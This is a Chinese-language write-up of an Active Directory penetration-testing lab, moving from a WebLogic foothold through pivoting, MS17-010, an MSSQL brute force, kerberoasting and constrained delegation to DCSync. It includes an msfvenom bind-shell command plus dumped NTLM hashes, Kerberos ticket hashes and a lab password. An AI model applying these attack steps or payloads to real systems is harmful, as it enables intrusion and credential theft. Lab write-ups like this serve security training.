​某内网域渗透靶场的writeup

Gcow安全团队

共 19047字,需浏览 39分钟

 ·

2021-11-27 09:15

某内网域渗透靶场的writeup

1.本文总计4346字,图片总计148张,但由于大量尝试环节,影响了看官体验,需要看官仔细看图以及文章内容,推荐阅读时间35-50分钟2.本文系小离@Gcow安全团队绝影小组原创文章,未经许可禁止转载3.若看官在阅读本文中遇到说得不清楚以及出现错误的部分请及时与公众号的私信联系谢谢各位师傅的指导

前言:

本靶场是由"渗透攻击红队"所制作的一个靶场,看了看感觉效果十分不错,比较综合且有一定的思路扩展性.这里我们将会从别的一些角度来玩玩这个靶场,具体往下看。

源作者的wp:https://mp.weixin.qq.com/s/dcYbIfLwN-Aw0Z9XxQSGkQ

Keep moving

1.本文采用 HTB/OSCP 的 Offensive style, 脱离CS, msf (msfvenom 不算)2.优先不走 EXP 路线3.靶场环境不能与实战相提并论4.且同时这是详细地记录了全过程针对于该靶场进行攻击.所以会有一些尝试与转换思路的部分.5.不喜勿喷

0x01 Enumeration

获取Target ip

1cc9a976ddf28f6bb6ba414a32a2974f.webppic1-获取Target ip

nmap

312549d8f29c4ba1ae2429c2269dbd7e.webp

pic2-nmap1

2be6aee1d12bfa12f57ab2271aa2c66b.webp

pic3-nmap2

尝试RPC匿名登录

a2a2cb24746f287c2639da9373734652.webppic4-尝试RPC匿名登录

smb 匿名共享

562794da06aab40292ea3fc7c0831e7d.webppic5-smb 匿名共享

获取目标有没有IPv6

42190f1b1f36b0882c04cb1a76e487eb.webppic6-获取目标有没有IPv6

RPC获取内网ip (rpcmap ncacn_ip)

42190f1b1f36b0882c04cb1a76e487eb.webppic7-rpcmap ncacn_ip
192.168.10.22810.10.20.12

获取weblogic 版本

f0cbf27a105b2fd8facad5c4cf9edbb9.webppic8-获取weblogic 版本

weblogic scan

8e641e235e5693748b9da443559fb460.webp

pic9-weblogic scan0x02 Foothold

CVE-2019-2725 to get command execution

75ff96c6767867b558a9f0e52b104a88.webppic10-CVE-2019-2725

whoami

ffb67a1d46f3d26116e159b747c9451f.webppic11-whoami

tasklist /svc resiult show me in wired way

3db35c03ecd8d2d22c7077dd0569a98d.webp

pic12-tasklist /svc

探测出不出网

44fd4058778c01b4bfccd4fb66307225.webp

pic13-探测出不出网16b8d9096613e6ea3021d4c39e41d45de.webppic14-探测出不出网2

Nishang

354ea57ac075e209ddfcaaabbb42c2b1.webppic15-Nishang1caf712ba9d940d6a69973e98e16bc24a.webppic16-Nishang2

Got reverse shell

2f6358d48e076770d07dd70841f86b4b.webppic17-Got reverse shell1238c2b9b65f1b75e3d53501b118375d1.webppic18-Got reverse shell2

whoami

220e07fef803d6910ec816d0967d4924.webppic19-whoami

IP configuration

发现有另外一个网段

bca3e7291414539f507f6c925626d8b9.webppic20-发现有另外一个网段

Enable winrm to get a better shell

810f56061a6457b2f085ebc81ff3f8e9.webppic21-winrm to get shell

Use reg save to dump hashes

39a3fd20c21fd4419896276948b76b42.webppic22-dumphash

Kali box pop up a smb server

9cfaaf1d48a99245e8c66430efd2139c.webppic23-smb server

Mount kali box share path

746c8b177dc5f898b4bf8fd52d985c05.webppic24-share path

Send it to me

4f586a6a6301edb85c65326aec319583.webppic25-send1

d482a49902e19c2f43b6ff5376dffe75.webp

pic26-send2

Hash dump

c456d9a03c0d4701014ec7d46f4e9ea9.webppic27-Hash dump
ccef208c6485269c20db2cad21734fe7

Login into winrm as Administrator

d4d6410c836a2f6f9d96771b74abfd59.webppic28-winrm to Administrator

flag

eeac340728456a32872ebfd0127dd007.webppic29-flag

Dump lsass

24f886e3fdc13c28645bf4167e61bf2e.webppic30-dump lsass1952e040b90b968fc3455708e08303605.webppic31-dump lsass2bcf1061b2f37abba52da8ef7a0814bb7.webppic32-dump lsass3

pypykatz

d43088526bdbb6f70db87c95cae4c23d.webppic33-pypykatz

But, I don't see any other credentials in dump file

cc422d0bb1c229a69ec43f56da8a1cdb.webppic34-weblogic credentials dump file

Weblogic password decryption: find out AES key

52ff975818c4bd1f8e0d8a23ab8ce41e.webp

pic35-weblogic AES key_1

ff9eed00e49438169224a4e48710da54.webp

pic36-weblogic AES key_2ef47b96b01f561816d377c5d945f7a20.webppic37-weblogic AES key_3
{AES}1zzY2R1UMGFWfd1rAA92N2QljODSa8S16dJIsZZi/do=

Weblogic password decryption: decrypt with dat file

9e27c01c784dab5df0be8a9f3db59c04.webppic38-decrypt weblogic dat file_1d6ebe456afdad91b1b35f1300f7d38c3.webppic39-decrypt weblogic dat file_2182f53c93d50d8bde084401d1b87324a.webppic40-decrypt weblogic dat file_3

Cleartext

weblogic123

Current credentials

administrator:ccef208c6485269c20db2cad21734fe7weblogic:weblogic123

0x03 Lateral Movement

Find another machines

8ada25c7a1b5d9617b2001e8d1b465a8.webppic41-find another machines
10.10.20.7

Upload portscan.ps1

(当然这里你也可以选择挂代理)

f31f1354bcb7b6b94cfbfad4966abeb2.webppic42-Upload portscan.ps1

scan 10.10.20.7

031bb6150e4193193cfb528a3162bc7f.webppic43-scan 10.10.20.7
135,139,445,49152,49153,49154,49155,49156

pivot

d8eddc8980d8eaf5e514b3c7ad3f2aab.webppic44-pivot

upload chisel

ede7a82ccb6d4e8625cd8543e6eeb80d.webppic45-upload chisel

Handled a proxy on port 8100

f2171530f4ba198ee899847bc6338d76.webppic46-proxy on port 8100

proxychain

bcf22cd35cd837863f3ef7c97b926633.webppic47-proxychain

nmap scan target over socks5

db0cc09ccc51cb34511ef87b363a3241.webppic48-nmap scan over socks5

10.10.20.7 report

d205628a16ac2e6036f409e7f1f05522.webp

pic49-10.10.20.7 report

Next Target

work-7.redteam.red

0x04 Work-7 takeover

Try to login rpc with anonymous user

a8db8d169bd64b09757cbfa30b147cc6.webppic50-login rpc with anonymous user

Login smb shares with anonymous user

af9f332096b529dc039cec8ef27ec6a6.webppic51-login smb shares with anonymous user

start to scan vulnerability of port 445

e37493e4c13f336cd299dbc5df0bacfb.webppic52-scan vulnerability of port 445

Got ms17-010 vulnerable alert

4c2b7130c0448ee62df59b47001ffa04.webppic53-Got ms17-010 vulnerable

Something funny

用之前的密码直接shell了(但是这是作弊,不可取) 后面查看了一下,密码这块设计得不太合理

d731b93ebb2fa08e9205551cbc64abd5.webp

pic54-密码设计存在非预期缺陷1cd866736365abc4fa3e7b672f135d32a.webppic55-密码设计存在非预期缺陷2

直接横向了

517eb67a7cf3097ed87c526e3e8be7fa.webp

pic56-横向移动1

3ba384eeb75c470c7105f1281d4d29bf.webp

pic57-横向移动2

get system

17c6e3f65b3979f51776934eb34ab0c3.webp

pic58-get system

回到刚刚,我们不选择作弊,查阅nmap结果,我们看到有ms17010

47cafdc9f456b0ee36bce16615c50478.webppic59-ms17010

MS17010 without metasploit

原先想用window/exec,每次攻击完都会炸,我这边测得不行... msfvenom bind shell

msfvenom -p windows/x64/shell_bind_tcp LPORT=9001-f raw -o test.bin && cat sc_x64_kernel.bin test.bin > sc_x64.bin

生成shellcode,并且merge with kernel header,然后send exploit,最后挂代理正向NC

1592b325185410170ac99640b2345287.webp

pic60-生成shellcode 代理正向NC

Shell came back: 康康有没有域

496cb01ebbb34ce186677c1a7d79bb39.webppic61-wmic查看域

本地先加hosts

59d9eaa2725f8c65e7a7199ab9597c98.webppic62-本地加hosts

看域控

917e22e8cd53bffadbd2076552daba76.webppic63-查看域控

获取域控ip

9fc64ac694cd499afc26f28fd4ce6cdb.webppic64-获取域控ip

查看本机ip,有另外一层网络: 10.10.10.0/24

27c91f3092fc47667bac4c131c7c0255.webppic65-查看本机ip

File Transfer in work-7

因为有一层代理的原因,所以下载win7的东西比较麻烦,win7从我这拿东西也麻烦 回到入口机器,添加一个xiaoli,并且加入管理员组(你可以转B64传上去,也可以开匿名共享,随你喜欢)

054c058d27d6cd57342636fd76dd7118.webppic66-创建一个用户并且加入管理员组

wrok-7这边直接挂载入口机器的C盘

f6210a59d0fdedd1888c288085a42036.webppic67-work-7挂载入口机器的c盘

Hash dump

当前work-7机器的system有点智障,虽然有个seimpersonateprivilege,但是我也能加用户(如果你知道当前system的权限发生了什么,麻烦私聊告诉我一下)

20b55d1c90270b7f3e72886d6cddf3b3.webppic68-reg save失败

添加 xiaoli 用户,并且加入管理员组

69eb534087cb5cfde3e25db8d709c163.webppic69-添加账户加入管理员组

添加上的用户没有显示pwned,非常奇怪,那也无妨,只是没有更好的 shell 而已

bf4641592752b2763669047d186a1c8e.webppic70-新添加的用户

runas 登录上创建的xiaoli用户,执行命令并且写到C:\nani.txt

64a7bafe8ee80c96d3c8d05ff31e650a.webppic71-runas登录创建的账户

查看C:\nani.txt,发现创建的用户privilege比现在多(对比分明)

6f1a616c14a4366297c04ff7c26a19a3.webppic72-查看nani.txt

Hash dump with runas

ca898db2ae41b50f67f10d835212317f.webppic73-通过runas dumphash1e35759d21e5e21e0599a2b8531287dbd.webppic74-通过runas dumphash1

放回挂载的共享磁盘

ebc811c158df94d1cef865541f3286e2.webppic75-放回挂载的共享磁盘

接着再取回到kali本地

ab76bdd3538fcff6625cd33a0449b056.webppic76-接着再取回到kali本地

Got hashes (图中框错地方了)

ecc3c73482b2784eda87d2f5eed7393b.webppic77-Got hashes_1

e2f1191795948220b82f59c5994071aa.webp

pic78-Got hashes_2
[*]Target system bootKey:0x6f92d265d06097e1615a7c355022bc9f[*]Dumpinglocal SAM hashes (uid:rid:lmhash:nthash)Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Guest:501:aad3b435b51404eeaad3b435b51404ee:e91d2eafde47de62c6c49a012b3a6af1:::john:1000:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::xiaoli:1036:aad3b435b51404eeaad3b435b51404ee:e91d2eafde47de62c6c49a012b3a6af1:::[*]Dumping cached domain logon information (domain/username:hash)REDTEAM.RED/saul:$DCC2$10240#saul#38df64c20e0fdadc85a421815ed5b011REDTEAM.RED/Administrator:$DCC2$10240#Administrator#1ca30d7ae7506e6ca094794f8167f1e4[*]Dumping LSA Secrets

其实可以使用进程注入,注入到有域凭据用户的进程,然而并没有

daf41f256e523d2341be601604fff3a4.webp

pic79-尝试进程注入窃取凭证,但是失败了

Dump lsass

不太死心,dump lsass康康

69c709ddc8daf468a7ee7f179deb36dc.webppic80-dump lsass

取回本地,minidump方式解开

298733e960aee682e96ac156fcf6df46.webppic81-minidump方式解开

无其他用户了,顺便机器账户顺走

139a5137b47295cb223a7b4aaf6a8d39.webppic82-域内用户1f954312f8c014311830248f033f0ff6d.webppic83-域内用户2
redteam.red\work-7$:f085f13639b3de3c78de926c0719d36d

Something makes me confused

这个应该算work-7的flag了,来saul用户桌面

9e89435c87d5f93b039b081ff8e81083.webppic84-work-7的flag_15712d7fece937c5addcea74433c60153.webppic85-work-7的flag_2

txt里面说john是本地管理员,但是算了(可能是靶场环境问题吧....)

f0d61634763a1e6ccc07e12bc7f873e7.webppic86-可能是靶场的环境问题

0x05 AD enumeration

AD informaton gathering

system 请求网络资源用的是机器账户,直接康康域内基本信息

62f1b03acd849a83e11cb90d5f5952a2.webppic87-域内基本信息15cb50f408f96f52bd0dcc8b315db85a4.webppic88-域内基本信息2

域控

c50651b128faf91fd581623e0762cd8b.webppic89-域控
OWA.redteam.red 10.10.10.8

域内两台机器,一台域控,算上自己,分别看IP

3ed678d0d3dc5418f53e3eae707e4926.webppic90-域内的两台机器-199fe9857826aa2e01db835d90d16ee51.webppic91-域内的两台机器-2
work-7.redteam.red 10.10.10.7SQLSERVER-2008.redteam.red 10.10.10.18OWA.redteam.red 10.10.10.8

基本操作

b11220180a3c17db444c057ca6888252.webppic92-收集域内用户名
net group"domain users"/domainThe request will be processed at a domain controller for domain redteam.red.Group name     DomainUsersCommentMembers-------------------------------------------------------------------------------adduser                  Administrator            apt404                   gu                       krbtgt                   mail                     saul                     saulgoodman              SM_4c09f7e38ef84c22b     SM_645db7f160894c7fb     SM_958e768f5a2e4c9fb     SM_dfb6b69905864ca19     sqlserver                The command completed successfully.

看域信任,无子域

e95372dff2fb024d9db5cf614cffbe0e.webppic93-看域信任

1 当然你也可以用powerview做信息收集,这边就不用了 2 实战的话,sharphound一般被杀得很严重,你可以远程执行bloodhound (ldapsearch with convertor),但是这边原先想直接上sharphound

看上去只有DotNET 3.5,目前只有sharphound2支持,sharphound2得弄一堆环境,懒了,看来只能远程bloodhound了

fcbff8fbadffe771779acada4c87ae61.webppic94-Net环境

Multi-level pivoting (No Frp)

回到入口机器,把原来的chisel client关了,重新开一个带端口转发的(此时work-7会断开,小问题,重新打回去)

44d3a9bd3c1861f6f85a99a6a4289587.webppic95-重新开端口转发

work-7 开多一个shell,上面port 9002,下面port 9001,并且上传 chisel 到 work-7

617dd7dcac0429066ddac8a4a489ae94.webppic96-开新shell

接着,入口机器再开一个server(reverse proxy)

d1e5a1510b47dd024b723633008a14d8.webppic97-reverse proxy

回到work-7那台机器,回连到入口机器

a347612fc56e89ff4f41a79a4cde499a.webppic98-回连入口机器

此时,本地访问8001就直接访问第二层了

f5a90715526d35810305c3c3a84c7ec2.webppic99-本地访问8001

修改proxy配置

08f3eb04bacc1c603f7ead21d7f5264f.webppic100-修改proxy配置

CME用机器账户登录一下域控的 LDAP 服务 ,已经到达了

26e478b99a5afd4c07cbf786c53d3338.webppic101-机器账户登录一下域控的 LDAP 服务

本地加hosts

79a24b8e56d4bbe32aab6acecb4c96e8.webppic102-本地加hosts

Bloodhound result analysis

Run bloodhound remotely

9bac59f6c097de3e5eebb07fc2fbe896.webppic102-bloodhound

Import results

f2fe5a41a19d026b83c7c76563d465b7.webppic103-Import results

Shortest path to domain admins

2b1d2a4a303df78547ac2b13a92e1a84.webppic104-Shortest path to domain admins

最短路径到Sqlserver用户

28c5b704eb06514584b2211921c62fbc.webppic105-最短路径到Sqlserver用户

SPN Accounts

ffec1073f5c6ef97fdc304d1f0f045b3.webppic106-SPN Accounts

获取 AS-REP Roastable users,并没有

a243b3e23f4584a9b8a466f08a4283a0.webppic107-获取 AS-REP Roastable users_16c4551bdbe268f69831400859e82d698.webppic108-获取 AS-REP Roastable users_2

kerberoasting attack

f3c892bf1d2ef6116680278ab2152a45.webp

pic109-kerberoasting attack
$krb5tgs$23$*sqlserver$REDTEAM.RED$redteam.red/sqlserver*$859542523a2e592829568bcf4b22adc7$bd544d4ce42f5c024184b2d61c42c8b0131edf5e161f36faf6cf5c9fea367c77907faca606bcb2d7ed5af99afeefef0fe1a6212639874834f1ea9226bd7c092a608b60f19b9442f64291c6c0bc8fa49ec4078ff597fdd69d5699ca1e9412cdd436c27977088ad8fb4863c8aabe4ccc080bebe8167d7907b7829f95aefdadb1a39e7ba276ecda0910bc363e3a45da7cbdec015487a9fff6dc57388855b71fb50536192cf22ecb341a1f9ae556b2a4fd52f52fd83cb9df27eefd0d54c22594bd41425fc30265789e26790e36066a67cfcf06343c43042940b97f5d659ef3fdbd13dd4db2199749190e1f9fb68c10116eb9889d54c1fc32c26d4f8e3e8b4075be4d09c30951550a611bbda43511c2d354e88c1eab79328fc4a79edd7b0adbaeeab175ce35c664935a58b25a2cb35c4a86c4f801678dbe9ae4b4c73af61998b063f1305a012164b5cbf556015b4d496dcf9d986e8c7d2ac70ade3a5103da73431e60b2b61f7821ead30734b6775c49ca895742f351bcfecad248e67ec3693466eccd30f4765ed083af1ecfec2d87e2859e85f84e3e941d821dfb7e5521aee38d709bcd541c6a1772a4c79e6fb5a55afcaedff6668a5667729473c801087725f30de6e2998f960d933e088febf7090f2fea71cf15d93850147d1d2e03db8d455ddba5af732128a7f852e52dc18bc9a70b9e9d9abb8e614206e2c3e728c20340cc0832f8297b0e8d72693cbcac8355da06c437dee968adea17338e4b934df96ff98b459cb78cd960015ef5295b62817ffe7a13121b674a3fb97dbbbcc1007397862dbd72a8c1047a9da618d3b96e444b0ce1868466ab91ffaadb2b7e3a81f35b343afa3396272dbaa8c8305414872ba668a206b326ce55213c5c50c551cd816ad6eed9739a009d088bb872e3853fffa7e3eaa982139587fa32bd06ef8b737d29cdc082a9a173989c8617917b3facb1e36cedd8774aa0c1756e76351162a6e3bfe4f2fa6bb9e88ae2c86fccfbc90050d867725b4f266048f7e6e9d1c296504c661883fac459f4e91e08dfc0bfd0c211541c16cb5e9ec30dffe99e326e7b3f8459d35b03a30847bd11a46e7ad77e096cce2a5a3cda1103615e307cfcaeffbb3febf795db58c16ecdfeeaa6fc003f308021594965f148f1163c739ad942050778cbe6e478114479c0cf69495c0f4831dea117ea9b90956c13a07edfcdf4c25d05087059106c11c195bc0412ad5dc8bc6b7159140c675f3e$krb5tgs$23$*saulgoodman$REDTEAM.RED$redteam.red/saulgoodman*$7d30d61df9b0fd9ca713c72ef6588b24$6dde0c314f9935c81d5a448d041ecdb45d5b8eebe88c480c7862a2932da02c655857f3b6122dfce0ea886b7835c6d8adde421eb3e5a960a10f01fa4789ba45e585975b54b7f2407bc61f839f8e6c0273cb58973da3d0dce43ea3a875e7fd6fa054016eb816fdf257f6e94535943a0d7cb13c4932ec3f661daef56d61beb0340a21582c578e4ce6c1839b493444e03f11ea79d7db8d4b74b7750cf9cc8881f0825a04959083ed72d9b17c0dc00ae28b04f930a66c995bff65e8cfe8e5eb1863a7d5a1536888df99a55febb1dc0cc80a099304feb6b252d8a7bafdf23a139abe7c03daeed388de81aaa7d9456adb355827420b9996d2e2e8d3e7180788def64c76aa15a319f486d94154cdc1ee888b67fd5058177fe123d48e67489e48ba860d5e79152082537213ccbfa90372f20a66834f9c2d6ef786a63943d00c7eb5665e257c5e06e84979a5f9a9c532e2a8912e44f1e226b68db269d367456b13b35cbe1caceb76dc9b19ff5e805260df270993cd8dd84d17574f6d20075c3ceedd070e57311d7b2e10ec4d0c1e700da04c43c4761e37af15a2c2145f42ccec3d66c992f153928c6d906d3fcec038e4d81211bccac30ed729a31c02d009c055de21d528e491aa805cd2f487eaefad4aeecc8b9db72902ef092dd8de0a3f42b8098aa0de970dce4b682d0f54c7edeb492af23d3062d614da5cf7ef875dd09000d14a3fcecbee4197902bfae6cecd94820d3b2217d443795489581d100171bfb5b95948eb836b76097cc9b60b6adb97647e465c0e6bb571af2fe332e92cfb35b56a4d281adf831dc13c1c5886f245085372d463a15dae82a2748717783d4c3e9d163c022ede2862a4b306603e77b4245aa5b7fd5ce3e70c20e466828a4b4583701b41f917e287c1cdb9f72d1c14918861b7d3c1610e2fbd5c7169e764e5311e1083f47b82b37cfba3bdc94fee39ef5d65649871287b6e08f8c03942ae01e727e793bf70d793761c78732d80c00c22365642258630cb237dd348b7ea2ab408420583f5786f179967b47aab39cf497159ec80f06226b74b2d150a85d956ab3db79a605c59c03a5b97c8772f584b15a94af23d9ba9d9cd6cbc78a56af19ae22a8c2dda248d4a53b9dc48a7d040172c73bb3f887c6f188dc83d18a6925d019946d8675efbd848132ee35ad0616177fde20738d7e9765ff21cd2a4f092b07acbbcf91b9eed8d5fb12a9a4da07c5546c3dab03424888ec9a42616d0

不幸的是,我没有爆出来

23cca5b8386b280516a06cbeef14938d.webppic110-很不幸没有成功

当然如果你的字典有的话,那你可以直接跳到约束委派了

8e61de0d53bab6f6f307e70d2f6a10a4.webppic111-无字典悲

换个思路

0x06 sqlserver-2008 takeover

前面提到域内还有另外一台机器,Nmap 扫描 sqlserver-2008

4255255c4e779e1464d6a0f28bdc0ef3.webppic112-Nmap 扫描 sqlserver-2008

sqlserver-2008报告

# Nmap 7.92 scan initiated Thu Nov 11 13:16:29 2021 as: nmap -sC -sV -sT -Pn -oA sqlserver/nmap -vvv 10.10.10.18Nmap scan report for sqlserver-2008(10.10.10.18)Hostis up, received user-set(1.0s latency).Scanned at 2021-11-1113:16:29 HKT for1132sNot shown:988 closed tcp ports (conn-refused)PORT      STATE SERVICE      REASON  VERSION80/tcp    open  http         syn-ack Microsoft IIS httpd 7.5|_http-server-header:Microsoft-IIS/7.5|_http-title: IIS7| http-methods:|SupportedMethods: OPTIONS TRACE GET HEAD POST|_  Potentially risky methods: TRACE135/tcp   open  msrpc        syn-ack MicrosoftWindows RPC139/tcp   open  netbios-ssn  syn-ack MicrosoftWindows netbios-ssn445/tcp   open  microsoft-ds syn-ack WindowsServer2008 R2 Datacenter7601ServicePack1 microsoft-ds1433/tcp  open  ms-sql-s     syn-ack Microsoft SQL Server200810.00.1600.00; RTM|_ssl-date:2021-11-11T05:36:06+00:00;+45sfrom scanner time.| ssl-cert:Subject: commonName=SSL_Self_Signed_Fallback|Issuer: commonName=SSL_Self_Signed_Fallback|PublicKey type: rsa|PublicKey bits:1024|SignatureAlgorithm: sha1WithRSAEncryption|Not valid before:2021-11-09T08:18:34|Not valid after:2051-11-09T08:18:34| MD5:8aaf87ec b5a3 8e9f c52f 80c544458e06| SHA-1: c677 90ba d6fe 6da629de dae6 084449ce5c292f88|-----BEGIN CERTIFICATE-----| MIIB+zCCAWSgAwIBAgIQYGTu9bynvLtNoEYZlMAoWTANBgkqhkiG9w0BAQUFADA7|MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA| bABsAGIAYQBjAGswIBcNMjExMTA5MDgxODM0WhgPMjA1MTExMDkwODE4MzRaMDsx| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs|AGwAYgBhAGMAazCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAl9gm+X/dC/ip|WnxqzLJQThFXQvm+aUyEoYuf3ZhNZh/ogz/QYXP7yMmOYbaSlScb/kaj2sloI1ik|3jJtVWvEpgV9bZQW5Eh2Hr/YKSTErpis+4+9N4afMopHQRRXdf+nnIQFXkE5wNXd|021lhqggGPRVBv8iNf/jH5xvtkqFyK8CAwEAATANBgkqhkiG9w0BAQUFAAOBgQA7| R9VTz2kwKwohCVgU4/nYH8VcuQazt8qA5/agD0b3iDzr3bPszKUqG3wLZc+sq1h6| OWE7oPCMyfb4zSWFGqw3nFQ7xOs24RHYFNO3LngrLkwrhJmLGwIPdt5ELOv1n74H|Hr46INlupWAYN/Ph+9i7PvZ1beLMh8c0wTCOkjwwWQ==|_-----END CERTIFICATE-----| ms-sql-ntlm-info:|Target_Name: REDTEAM|NetBIOS_Domain_Name: REDTEAM|NetBIOS_Computer_Name: SQLSERVER-2008|   DNS_Domain_Name: redteam.red|   DNS_Computer_Name: sqlserver-2008.redteam.red|   DNS_Tree_Name: redteam.red|_  Product_Version:6.1.76012383/tcp  open  ms-olap4?    syn-ack49152/tcp open  msrpc        syn-ack MicrosoftWindows RPC49153/tcp open  msrpc        syn-ack MicrosoftWindows RPC49154/tcp open  msrpc        syn-ack MicrosoftWindows RPC49155/tcp open  msrpc        syn-ack MicrosoftWindows RPC49156/tcp open  msrpc        syn-ack MicrosoftWindows RPC49157/tcp open  msrpc        syn-ack MicrosoftWindows RPCServiceInfo:OSs:Windows,WindowsServer2008 R2 2012; CPE: cpe:/o:microsoft:windowsHost script results:| p2p-conficker:|CheckingforConficker.C or higher...|Check1(port 57750/tcp): CLEAN (Couldn't establish connection (Nsock connect failed immediately))|Check2(port 12518/tcp): CLEAN (Couldn't establish connection (Nsock connect failed immediately))|Check3(port 11000/udp): CLEAN (Timeout)|Check4(port 8803/udp): CLEAN (Timeout)|_  0/4 checks are positive:Hostis CLEAN or ports are blocked|_clock-skew: mean:-1h35m17s, deviation:3h34m40s, median:43s| smb-os-discovery:|   OS:WindowsServer2008 R2 Datacenter7601ServicePack1(WindowsServer2008 R2 Datacenter6.1)|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1|Computer name: sqlserver-2008|NetBIOS computer name: SQLSERVER-2008\x00|Domain name: redteam.red|Forest name: redteam.red|   FQDN: sqlserver-2008.redteam.red|_  System time:2021-11-11T13:35:52+08:00| ms-sql-info:|10.10.10.18:1433:|Version:|       name:Microsoft SQL Server2008 RTM|       number:10.00.1600.00|Product:Microsoft SQL Server2008|Service pack level: RTM|Post-SP patches applied:false|_    TCP port:1433| smb2-security-mode:|2.1:|_    Message signing enabled but not required| smb-security-mode:|   account_used:<blank>|   authentication_level: user|   challenge_response: supported|_  message_signing: disabled (dangerous, but default)| smb2-time:|   date:2021-11-11T05:36:00|_  start_date:2021-11-09T08:18:45Read data files from:/usr/bin/../share/nmapService detection performed.Please report any incorrect results at https://nmap.org/submit/ .# Nmap done at Thu Nov 11 13:35:21 2021 -1 IP address (1 host up) scanned in 1132.14 seconds

既然出题人那么喜欢ms17010,那我也来脚本小子一下,可惜并没有

802fa7b3506cd9fa0a6b2e000a0a0671.webppic113-尝试ms17010但是失败

Try to login SMB shares with anonymous user

282aecb477ab358ad17c818a92926c73.webppic114-login SMB shares with anonymous user

Try to login rpc with anonymous user

77d9921adc20ce14a8e65d6ee009e66c.webppic115-login rpc with anonymous user

康康有没有别的ip段,或者看看有没有 IPv6

0dd69b144a6cf947b4f079fec7f0352f.webppic116-扩展一下别的段

Port 2383

SQL之类的服务,那么我们现在康康端口80和1433

c17dba3657e5768b9387e4188722b946.webppic117-port 2383

Port 80

web service directory brute force

c3b47a7e7f015f8218ec08e0cf08c5ad.webppic118-web目录爆破

Port 1433

看上去是一个老版本的 SQL Server(没有找 EXP) 尝试mssql爆破,impacket 和 CME 报错了

69f4307ae68fb7cb4340886eb1d8c71f.webppic119-尝试mssql爆破-155f6ac8b46f99923db7e5b0dcac3c400.webppic120-尝试mssql爆破-2

但是失败了

自己写的 MSSQL 爆破工具(找大牛加的多线程) 使用常用 mssql 用户名和密码(From seclist)

5f9c886e8594340f24125be16700e02a.webppic121-生成常用的mssql的用户名和密码

爆破mssql,没有报错(展示)

08decdaf0a22b65f355d99a94c2bff04.webppic122-爆破mssql

爆破成功

1ff2c57c98f612eb604b81f317ff70f0.webppic123-爆破成功

Try to get bind shell

登录,xp_cmdshell

223cbb53b08fc6a8b95bb870e92f317a.webppic124-xp_cmdshell

Powershell Bind shell oneliner

a2a7f963b0fda4fdf31c4aa7dbee9271.webppic125-Powershell Bind shell oneliner

尝试连接,可以

9540caa7b9345b48f0f2bf0fd4216e48.webp


pic126-连接成功

Privilege escalation

Current privileges

3dc7dc4cf0cbb3b1441335ade2264830.webppic127-Current privileges

Download potato

d68a90efdfbc0c8dc5ac89f2f07b0b45.webppic128-Download potato

Upload it

(Sql server 连接脚本自带UPLOAD命令,原理:转b64 locally, 然后切割大小为1024kb,,再回到windows copy合成一份,接着再解密)

52c4a3b1a9397ba08dc028b1493caff9.webppic129-upload potato

Try to do privilege escalation and we get system (default clsid)

f252f3bf2958a2333d3412099dcb86f1.webppic130-privilege escalation

Get shell with system privilege

6b3f606038b226eebe9102cc7083a9c2.webppic131-get system shell

flag

04ef56d18bdad8e8dd90b991bcce3da1.webppic132-get flag

Get credentials

查看当前进程,当前进程有sqlserver的存在

670be0c0d95e4676fc80b0a41c6ec4f5.webppic133-sqlserver进程

Upload procdump

fa2bfb16118584de5cabcbfce62158d3.webppic134-upload procdump

dump lsass & hash dump through reg save

dd3ecc386ef6124466f7bb6405354b80.webppic135-dump hash

开SMB匿名,www目录我放不了文件,不知道为什么,放了进去没读权限,用户下不了。(icacls也试了,不行) 这边就直接绕路,用三好学生的匿名共享脚本 (我自己创建了个本地管理员用户,但是SMB连不上,所以才用匿名共享)

5fd047e6c565293909a26a216faebe6b.webppic136-smb匿名共享18757a77655ff1c1ea4f7783cc62a9f4d.webppic137-smb匿名共享2

smb 下载文件

0c6dc8f12bb6cbc790dbeabf8042a5b3.webppic138-smb下载文件

下载完成后,关闭匿名共享

7abd21c09079ef9580b1446f6a96831a.webppic139-关闭匿名共享

secretsdump 解开reg save的hashes

7ed7ad8dde4c3e38ae09e5dedb1db217.webppic140-secretsdump解reg save的hash

解开lsass的dump文件,现在有sqlserver的凭据了

e15a7fd4ea96b729100b9eb915b5c65d.webppic141-获取sqlserver的凭据_110489f9c01d19785848a70f034fcc1e7.webppic142-获取sqlserver的凭据_2
sqlserver:6a59bf65a4957ac67e5fb4e1c221939c

Login ldap with user: sqlserver

2a88a585cc5de16d1150730a0bb33652.webppic143-Login ldap(sqlserver)0x07 DC takeover

Attack path which I method

User: redteam.red/sqlserver is allow to delegate cifs service of OWA(DC controller)

9f1799f74152bdcd550b3f7e89939e5c.webppic144-sqlserver允许委派OWA的cifs服务

Constrained delegation Attack

efbdae225341ed4cfb4e2425a4c1e6a8.webppic145-约束委派攻击

DCsync

4f00c2c158db2205fcecaf7f4e13b03a.webp


pic146-DCsync


redteam.red\Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a67f14d5cc4fa22618c8b609e832db6:::redteam.red\SM_4c09f7e38ef84c22b:1120:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::redteam.red\SM_dfb6b69905864ca19:1121:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::redteam.red\SM_958e768f5a2e4c9fb:1122:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::redteam.red\SM_645db7f160894c7fb:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::redteam.red\mail:1125:aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c:::redteam.red\sqlserver:1126:aad3b435b51404eeaad3b435b51404ee:6a59bf65a4957ac67e5fb4e1c221939c:::redteam.red\saulgoodman:1128:aad3b435b51404eeaad3b435b51404ee:c0e1f147edf7462134f07e389c5466e2:::redteam.red\gu:1